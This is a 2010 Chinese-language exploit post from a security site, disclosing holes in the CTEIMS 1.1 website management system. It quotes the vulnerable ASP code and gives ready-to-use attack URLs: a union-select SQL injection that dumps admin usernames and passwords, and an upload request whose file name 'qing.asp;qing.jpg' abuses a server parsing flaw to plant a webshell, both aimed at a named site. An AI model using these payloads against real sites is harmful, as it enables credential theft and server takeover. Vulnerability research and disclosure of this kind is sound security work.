首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
站易企网站管理系统CTEIMS 1.1 0day
来源:vfocus.net 作者:vfocus 发布时间:2010-09-10  

站易企网站管理系统CTEIMS 1.1 这个程序,漏洞很多。

由于注入太多了,我也就不写其他的了,就说这个注射。根目录下面about.asp

<%
id=funstr(request.QueryString("id"))   //这个函数我压根就不知道是做什么的
if id="" then
rs_page=rsfun("Select * from CT_menu where id=1",1)
else
rs_page=rsfun("Select * from CT_menu where id="&id,1) //注射产生了
end if
typeid=rs_page("id")
%>


利用方法如下:


http://www.hackqing.cn/about.asp?id=0 union select 1,2,3,4,5,6,7,8,9,10,userid%26pwd,12,13,14,15,16,17,18 from CT_admin


前台我看都不想看了,于是直接跳到了后台,一眼就看到了upfile_flash.asp这个文件,大家应该都想到什么了吧。明小子就可以直接上传,不过我们不用那么做,我们可以更简单的上传我们的木马。

 

<%
set upload=new upload_file
if upload.form("act")="uploadfile" then
filepath=trim(upload.form("filepath"))


filelx=trim(upload.form("filelx"))

i=0
for each formName in upload.File
    set file=upload.File(formName)

fileExt=lcase(file.FileExt) '得到的文件扩展名不含有.

      …………………………………………
randomize
ranNum=int(90000*rnd)+10000
filetxt=trim(upload.form("filetxt"))
if filetxt="" then       //这里是亮点
filename=filepath&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
else
filename=filepath&filetxt&"."&fileExt   //上传成功了
end if
%>
<%
if file.FileSize>0 then         ''如果 FileSize > 0 说明有文件数据
file.SaveToFile Server.mappath(FileName)
if filelx="swf" then
      response.write "<script>window.opener.document."&upload.form("FormName")&".size.value='"&int(file.FileSize/1024)&" K'</script>"
end if
response.write "<script>window.opener.document."&upload.form("FormName")&"."&upload.form("EditName")&".value='"&FileName&"'</script>"
%>


我们可以直接构造filetxt=qing.asp;qing.jpg 利用解析漏洞获取webshell。利用方法如下:


http://www.hackqing.cn/admin/upload_flash.asp?formname=form1&editname=cfg_logo&uppath=/images&filelx=imgtype&pm=1&filetxt=qing.asp;qing.jpg
直接上传我们的木马(得把木马改成图片格式哟~)

结果如下:


 



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·PHP168 V6.02整站系统远程执行任
·Phpcms2008本地文件包含漏洞及利
·SiteEngine CMS 5.1.0 文件上传
·Phpcms2008本地文件包含漏洞及利
·FCKeditor二次上传拿shell
·Phpwind 注入以及利用之一:远程
·phpwind远程代码执行漏洞
·phpcms 2008 sp4 爆路径及任意文
·Piwik和OpenX多版本存在PHP远程
·老Y文章管理系统 v2.5 sp2 SQL注
·dede的又一个代码执行
·酷我音乐盒存在DLL劫持漏洞(mfc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved